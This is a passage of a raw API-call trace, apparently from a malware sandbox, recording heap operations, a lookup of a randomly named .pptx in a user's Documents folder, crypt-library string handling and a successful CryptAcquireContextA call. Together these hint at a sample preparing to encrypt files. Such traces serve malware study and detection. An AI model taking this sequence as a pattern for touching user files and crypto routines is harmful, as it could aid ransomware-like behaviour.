0x2e54c78 [0265.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0265.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0265.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0265.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0265.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0265.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0265.048] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0265.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0265.048] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0265.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0265.048] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/L7MGGQIaJ.pptx", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff1f8730, ftCreationTime.dwHighDateTime=0x1d5e60c, ftLastAccessTime.dwLowDateTime=0xf907a110, ftLastAccessTime.dwHighDateTime=0x1d5ed24, ftLastWriteTime.dwLowDateTime=0xf907a110, ftLastWriteTime.dwHighDateTime=0x1d5ed24, nFileSizeHigh=0x0, nFileSizeLow=0x153c2, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="L7MGGQIaJ.pptx", cAlternateFileName="L7MGGQ~1.PPT")) returned 0xa87690 [0265.048] FindClose (in: hFindFile=0xa87690 | out: hFindFile=0xa87690) returned 1 [0265.049] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0265.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0265.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0265.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0265.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0265.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0265.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0265.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0265.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0265.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0265.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0265.049] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0265.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0265.049] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0265.049] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0265.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0265.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0265.049] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0265.050] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0265.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0265.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0265.050] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0265.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0265.050] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0265.050] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0265.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0265.050] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0265.050] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0265.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0265.050] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0265.050] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0265.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0265.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0265.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0265.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0265.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0265.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0265.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0265.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0265.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0265.051] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0265.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0265.051] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0265.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0265.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0265.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0265.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0265.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0265.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0265.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0265.051] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0265.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0265.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0265.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0265.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0265.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0265.052] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0265.052] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0265.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0265.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0265.064] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0265.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0265.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0265.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0265.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0265.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0265.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0265.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0265.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0265.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0265.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0265.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0265.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0265.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0265.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0265.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0265.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0265.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0265.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0265.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0265.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0265.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0265.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0265.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0265.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0265.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0265.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0265.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0265.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0265.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0265.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0265.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0265.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0265.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0265.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0265.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0265.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0265.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0265.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0265.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0265.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0265.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0265.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0265.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0265.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0265.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0265.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0265.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0265.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0265.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0265.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0265.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0265.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0265.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0265.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0265.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0265.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0265.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0265.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0265.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0265.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e698c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0265.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0265.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0265.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0265.067] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0265.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0265.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0265.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0265.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0265.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0265.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0265.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0265.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69b08 [0265.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69b08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0265.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0265.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0265.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0265.067] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0265.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0265.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0265.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0265.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0265.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0265.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0265.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0265.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0265.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0265.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0265.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0265.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0265.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0265.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0265.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0265.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0265.068] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0265.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14038 [0265.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0265.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0265.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0265.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0265.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0265.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0265.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0265.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0265.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0265.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0265.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0265.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0265.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0265.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0265.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0265.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0265.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0265.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0265.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0265.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0265.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0265.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0265.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0265.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0265.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0265.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0265.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0265.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0265.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0265.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0265.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0265.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0265.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0265.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0265.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0265.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0265.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0265.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0265.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0265.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0265.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0265.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0265.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0265.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0265.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0265.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0265.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0265.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0265.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0265.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: 